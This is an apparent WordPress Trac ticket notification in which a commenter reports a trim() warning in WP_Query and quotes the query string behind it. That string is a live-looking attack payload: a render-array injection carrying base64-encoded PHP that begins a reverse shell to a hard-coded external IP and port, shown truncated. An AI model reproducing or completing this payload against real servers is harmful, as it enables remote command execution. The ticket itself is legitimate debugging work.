[wp-trac] [WordPress Trac] #17737: Be better at forcing data types for query vars

Thu Jan 14 11:51:57 UTC 2021

#17737: Be better at forcing data types for query vars
-------------------------------------+-----------------------------
 Reporter:  juliobox                 |       Owner:  SergeyBiryukov
     Type:  defect (bug)             |      Status:  reviewing
 Priority:  normal                   |   Milestone:  Future Release
Component:  Query                    |     Version:  3.0
 Severity:  normal                   |  Resolution:
 Keywords:  has-patch needs-refresh  |     Focuses:
-------------------------------------+-----------------------------

Comment (by jamieburchell):

 Seeing this in my logs today:

 {{{Warning: trim() expects parameter 1 to be string, array given /wp-
 includes/class-wp-query.php in WP_Query::parse_query at line 779}}}

 This seems to be

 {{{$qv['name']     = trim( $qv['name'] );}}}

 Query string payload:

 {{{?name%5B%23markup%5D=eval%28base64_decode%28%29%22Lyo8P3BocCAvKiovCkBlcnJvcl9yZXBvcnRpbmcoMCk7CkBzZXRfdGltZV9saW1pdCgwKTsgQGlnbm9yZV91c2VyX2Fib3J0KDEpOyBAaW5pX3NldCgibWF4X2V4ZWN1dGlvbl90aW1lIiwwKTsKJGRpcz1AaW5pX2dldCgiZGlzYWJsZV9mdW5jdGlvbnMiKTsKaWYoIWVtcHR5KCRkaXMpKXsKJGRpcz1wcmVnX3JlcGxhY2UoIi9bLCBdKy8iLCAiLCIsICRkaXMpOwokZGlzPWV4cGxvZGUoIiwiLCAkZGlzKTsKJGRpcz1hcnJheV9tYXAoInRyaW0iLCAkZGlzKTsKfWVsc2V7CiRkaXM9YXJyYXkoKTsKfQoKJGlwYWRkcj0iMTkzLjIzOS4xNDcuMjI0IjsKJHBvcnQ9OTk5OTsKCmlmKCFmdW5jdGlvbl9leGlzdHMoIkpqV3piayIpKXsKZnVuY3Rpb24gSmpXemJrKCRjKXsKZ2xvYmFsICRkaXM7CgokSlRLR0ZFPSJpc19jYWxsYWJsZSI7CiRUQUNXZ1BQPSJpbl9hcnJheSI7CgppZigkSlRLR0ZFKCJzeXN0ZW0iKWFuZCEkVEFDV2dQUCgic3lzdGVtIiwkZGlzKSl7Cm9iX3N0YXJ0KCk7CnN5c3RlbSgkYyk7CiRvPW9iX2dldF9jb250ZW50cygpOwpvYl9lbmRfY2xlYW4oKTsKfWVsc2UKaWYoJEpUS0dGRSgiZXhlYyIpYW5kISRUQUNXZ1BQKCJleGVjIiwkZGlzKSl7CiRvPWFycmF5KCk7CmV4ZWMoJGMsJG8pOwokbz1qb2luKGNocigxMCksJG8pLmNocigxMCk7Cn1lbHNlCmlmKCRKVEtHRkUoInByb2Nfb3BlbiIpYW5kISRUQUNXZ1...&name%5B%23post
 _render%5D%5B%5D=assert&q=%5BFiltered%5D}}}

-- 
Ticket URL: <https://core.trac.wordpress.org/ticket/17737#comment:46>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform